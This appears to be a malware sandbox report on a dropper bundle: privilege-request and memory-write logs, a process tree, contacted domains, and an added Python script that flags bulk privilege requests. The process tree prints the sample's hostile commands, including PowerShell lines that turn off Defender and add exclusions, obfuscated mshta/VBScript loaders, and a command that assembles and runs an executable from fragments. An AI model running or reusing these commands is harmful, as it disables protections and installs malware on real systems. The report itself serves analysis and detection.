Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
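Thu1231d30cda84872.exe, the same binary that drops the Chrome extension, requests the privileges with LUIDs 2 through 35 in order, including five (31 to 35) that the sandbox could not name; in winnt.h those are SeTrustedCredManAccessPrivilege, SeRelabelPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege. A contiguous sweep like this is the footprint of a loop that calls AdjustTokenPrivileges for every privilege the system knows, not of a program that needs one or two. Note that AdjustTokenPrivileges can only enable privileges the token already holds, so what the sandbox records is the request, not success; from a non-elevated token most of these calls return ERROR_NOT_ALL_ASSIGNED. The Python below is an added example, not code from the report, that resolves the numeric LUIDs, normalises the two shortened spellings the sandbox uses (SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege), flags processes whose requests cover the whole 2 to 35 range, and lists the SeDebugPrivilege requesters. The sample rows are constructed from the table above; the whole-range rule is an assumption for illustration.

```python
"""Resolve the privilege names in 'Suspicious use of AdjustPrivilegeToken' rows
and flag processes that try to enable the entire privilege range.

Row shape, as in the report:  Token: <privilege name or LUID> N/A <process path> N/A
"""
import re
from collections import defaultdict
from ntpath import basename

# LUID -> privilege name, from the SE_*_PRIVILEGE constants in winnt.h.
LUID_NAMES = {
    2: "SeCreateTokenPrivilege", 3: "SeAssignPrimaryTokenPrivilege",
    4: "SeLockMemoryPrivilege", 5: "SeIncreaseQuotaPrivilege",
    6: "SeMachineAccountPrivilege", 7: "SeTcbPrivilege",
    8: "SeSecurityPrivilege", 9: "SeTakeOwnershipPrivilege",
    10: "SeLoadDriverPrivilege", 11: "SeSystemProfilePrivilege",
    12: "SeSystemtimePrivilege", 13: "SeProfileSingleProcessPrivilege",
    14: "SeIncreaseBasePriorityPrivilege", 15: "SeCreatePagefilePrivilege",
    16: "SeCreatePermanentPrivilege", 17: "SeBackupPrivilege",
    18: "SeRestorePrivilege", 19: "SeShutdownPrivilege",
    20: "SeDebugPrivilege", 21: "SeAuditPrivilege",
    22: "SeSystemEnvironmentPrivilege", 23: "SeChangeNotifyPrivilege",
    24: "SeRemoteShutdownPrivilege", 25: "SeUndockPrivilege",
    26: "SeSyncAgentPrivilege", 27: "SeEnableDelegationPrivilege",
    28: "SeManageVolumePrivilege", 29: "SeImpersonatePrivilege",
    30: "SeCreateGlobalPrivilege", 31: "SeTrustedCredManAccessPrivilege",
    32: "SeRelabelPrivilege", 33: "SeIncreaseWorkingSetPrivilege",
    34: "SeTimeZonePrivilege", 35: "SeCreateSymbolicLinkPrivilege",
}
NAME_TO_LUID = {name: luid for luid, name in LUID_NAMES.items()}
# Shortened spellings the sandbox report uses for two of the names.
ALIASES = {
    "SeProfSingleProcessPrivilege": "SeProfileSingleProcessPrivilege",
    "SeIncBasePriorityPrivilege": "SeIncreaseBasePriorityPrivilege",
}
ROW_RE = re.compile(r"^Token: (\S+) N/A (.+) N/A$")


def resolve(token):
    """Map a numeric LUID or a sandbox spelling to the winnt.h privilege name."""
    if token.isdigit():
        return LUID_NAMES.get(int(token), f"LUID_{token}")
    return ALIASES.get(token, token)


def parse_rows(text):
    events = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            events.append((resolve(m.group(1)), m.group(2)))
    return events


def summarize(events):
    """Process path -> distinct privileges requested, in first-seen order."""
    seen = defaultdict(list)
    for name, proc in events:
        if name not in seen[proc]:
            seen[proc].append(name)
    return dict(seen)


def is_bulk_enable(names):
    """Assumed rule: the request set covers every LUID from 2 to 35."""
    luids = {NAME_TO_LUID[n] for n in names if n in NAME_TO_LUID}
    return all(luid in luids for luid in range(2, 36))


def bulk_enablers(events):
    return sorted((basename(p) for p, names in summarize(events).items()
                   if is_bulk_enable(names)), key=str.lower)


def debug_requesters(events):
    return sorted({basename(p) for name, p in events if name == "SeDebugPrivilege"},
                  key=str.lower)


# Constructed sample mirroring the rows in the table above.
DROPPER = r"C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe"
_DROPPER_TOKENS = (
    "SeCreateTokenPrivilege SeAssignPrimaryTokenPrivilege SeLockMemoryPrivilege "
    "SeIncreaseQuotaPrivilege SeMachineAccountPrivilege SeTcbPrivilege "
    "SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege "
    "SeSystemProfilePrivilege SeSystemtimePrivilege SeProfSingleProcessPrivilege "
    "SeIncBasePriorityPrivilege SeCreatePagefilePrivilege SeCreatePermanentPrivilege "
    "SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege SeDebugPrivilege "
    "SeAuditPrivilege SeSystemEnvironmentPrivilege SeChangeNotifyPrivilege "
    "SeRemoteShutdownPrivilege SeUndockPrivilege SeSyncAgentPrivilege "
    "SeEnableDelegationPrivilege SeManageVolumePrivilege SeImpersonatePrivilege "
    "SeCreateGlobalPrivilege 31 32 33 34 35"
).split()
SAMPLE_ROWS = "\n".join(f"Token: {t} N/A {DROPPER} N/A" for t in _DROPPER_TOKENS) + "\n" + r"""Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12b275ee70c7e913.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A"""

if __name__ == "__main__":
    ev = parse_rows(SAMPLE_ROWS)
    print("bulk privilege enablers:", bulk_enablers(ev))
    print("SeDebugPrivilege requesters:", debug_requesters(ev))
```

Only the dropper matches the whole-range rule; taskkill.exe and powershell.exe asking for SeDebugPrivilege is ordinary for those tools, which is why the debug list is worth reading alongside the process tree rather than on its own.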

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (26 identical rows)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (24 identical rows)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3124 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe
PID 3124 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe
PID 3124 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe
PID 4708 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2188 wrote to memory of 5036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5080 wrote to memory of 4132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4708 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 60 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe
PID 528 wrote to memory of 4048 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe
PID 4112 wrote to memory of 2564 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu128b511c77e8c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu123e05ebe43921.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu124078ed79bdbd5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu126011caea28.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu1231d30cda84872.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu120bfbc2443b3b5d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu122f7469b214cb59.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu1262fd911d3e6320.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12912263469836d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12493eba7a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12ca1c119bc29.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12b275ee70c7e913.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12465fe68f85b6156.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu125e541847539.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe

Thu12465fe68f85b6156.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe

Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe

Thu1231d30cda84872.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu122f7469b214cb59.exe

Thu122f7469b214cb59.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1262fd911d3e6320.exe

Thu1262fd911d3e6320.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe

Thu128b511c77e8c.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12b275ee70c7e913.exe

Thu12b275ee70c7e913.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu120bfbc2443b3b5d.exe

Thu120bfbc2443b3b5d.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe

Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu124078ed79bdbd5.exe

Thu124078ed79bdbd5.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe

Thu125e541847539.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4708 -ip 4708

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu123e05ebe43921.exe

Thu123e05ebe43921.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe

Thu12493eba7a.exe

C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp

"C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp" /SL5="$40240,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe"

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12ca1c119bc29.exe

Thu12ca1c119bc29.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 616

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe

"C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ( "cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )

C:\Users\Admin\AppData\Local\Temp\is-5BQ15.tmp\Thu125e541847539.tmp

"C:\Users\Admin\AppData\Local\Temp\is-5BQ15.tmp\Thu125e541847539.tmp" /SL5="$B01D0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2564 -ip 2564

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "" == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe" ) do taskkill -f -Im "%~nXQ"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 360

C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe

yDhNY.exe /pFKkSWJQc5v2ppVFMo

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill -f -Im "Thu12493eba7a.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ( "cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If ""/pFKkSWJQc5v2ppVFMo "" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "/pFKkSWJQc5v2ppVFMo " == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" ) do taskkill -f -Im "%~nXQ"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe (CREATeOBJEcT ( "WScRIPt.SHEll" ). rUN ( "C:\Windows\system32\cmd.exe /Q /R eCHo | set /P = ""MZ"" > 1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7 " , 0 ,trUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1FRnX.N"

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe -Y .\ISA502G.S7

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffd30c8cc40,0x7ffd30c8cc4c,0x7ffd30c8cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2000,i,5828647444638608440,5241468669238145442,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1992 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,5828647444638608440,5241468669238145442,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2256,i,5828647444638608440,5241468669238145442,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2340 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,5828647444638608440,5241468669238145442,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3124 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3244,i,5828647444638608440,5241468669238145442,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3256 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4588,i,5828647444638608440,5241468669238145442,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4528 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3748,i,5828647444638608440,5241468669238145442,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4728 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5004,i,5828647444638608440,5241468669238145442,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5016 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 marianu.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 propanla.com udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 gcl-gb.biz udp
N/A 127.0.0.1:56142 tcp
N/A 127.0.0.1:56144 tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
